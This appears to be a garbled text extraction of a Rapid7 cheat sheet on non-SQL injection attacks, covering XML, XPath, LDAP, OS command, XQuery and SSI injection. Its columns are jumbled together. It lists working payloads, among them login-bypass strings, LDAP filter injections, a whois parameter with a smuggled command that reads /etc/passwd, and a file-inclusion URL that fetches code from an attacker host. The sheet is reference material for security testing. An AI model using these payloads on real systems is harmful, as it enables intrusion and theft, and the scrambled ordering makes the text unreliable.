Professional Documents
Culture Documents
Injection Non-SQL Cheat Sheet
Injection Non-SQL Cheat Sheet
XML Injection
Detection
single quote
double quote
XPATH Injection
<>
angular parentheses
Detection
<!--/-->
single quote
&
ampersand
double quote
<![CDATA[ / ]]>
www.rapid7.com
Exploitation
Exploitation
or 1=1 or =
] | * | user[@role=admin
NODENAME
//NODENAME
http://www.example.com/addUser.php?us
ername=dan&password=123456<!--email:
--><userid>0</userid><mail>foo@emaildomain.com
NODENAME//SUBNODENAME
OS Command Injection
//NODENAME/[NAME=VALUE]
Detection
http://site.com/login.
aspx?username=foo or 1=1 or =
Login bypass
LDAP Injection
| <ANOTHER COMMAND>
; <ANOTHER COMMAND>
Exploitation
Detection
%<ENV VARIABLE>%
Windows only
opening bracket
&
closing bracket
://site.com/whois.php?domain=foobar;
echo+/etc/passwd
&
XQuery Injection
Detection
Exploitation
single quote
(&(param1=val1)(param2=val2))
AND operator
double quote
(|(param1=val1)(param2=val2))
OR operator
Exploitation
*)(ObjectClass=*))
(&(objectClass=void
or <ATTACK> or .=
void)(ObjectClass=void))(&(objectClass=void
http://site.com/ldapsearch?user=*
something or =
SSI Injection
Detection
Upload File
Upload file
PHP, JSP, ASP etc.
execution!
http://site.com/xmlsearch?user=foo or =
.SHTML
File extension
Exploitation
< ! # = / . - > and [a-zA-Z0-9]
PHP call
http://site.com/page.php?file=http://www.attacker.com/exploit
Injecting